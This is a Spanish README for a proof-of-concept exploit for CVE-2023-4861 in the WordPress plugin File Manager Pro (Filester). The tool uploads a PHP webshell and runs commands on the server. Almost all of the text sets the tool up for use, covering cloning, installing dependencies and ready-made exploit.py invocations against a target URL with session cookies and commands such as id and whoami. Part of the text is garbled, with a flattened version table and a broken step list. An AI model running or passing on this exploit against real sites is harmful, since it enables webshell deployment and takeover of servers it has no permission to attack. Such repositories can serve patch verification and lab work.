
Prueba de concepto automatizada para la ejecución remota de código autenticada en WordPress File Manager Pro (Filester) mediante la carga arbitraria de archivos, incluyendo el despliegue de webshell y la ejecución de comandos.
Este repositorio contiene una prueba de concepto en Python para CVE-2023-4861, un problema de ejecución remota de código autenticada en el plugin de WordPress File Manager Pro - Filester.
CVE-2023-4861File Manager Pro - Filester (filester)< 1.8.11.8.1Admin+ en Filesterexploit.py automatiza el mismo resultado básico descrito en el aviso público:
/var/www/html/ y permitir la carga de .php.Detalle importante de implementación: mi PoC asume que la raíz web del objetivo es /var/www/html/. Eso está codificado en los datos de la solicitud y puede requerir ajustes para otras configuraciones de laboratorio.
Clona el repositorio y accede a él:
git clone https://github.com/nomaisthere/CVE-2023-4861-PoC.git
cd CVE-2023-4861-PoC
Instala las dependencias:
pip install requests
Muestra la ayuda:
python3 exploit.py --help
Ejemplo básico:
python3 exploit.py --url http://target-wordpress --command id \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'
Nombre de shell personalizado opcional:
python3 exploit.py --url http://target-wordpress --shell-name shell.php --command whoami \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'